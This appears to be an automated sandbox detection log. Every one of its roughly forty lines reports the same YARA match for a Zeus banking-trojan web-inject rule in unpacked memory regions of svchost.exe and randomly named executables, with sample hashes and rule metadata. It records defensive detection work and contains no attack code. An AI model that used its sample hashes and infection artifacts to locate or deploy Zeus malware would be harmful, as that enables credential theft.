Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.10b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.ae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.f30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.ae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
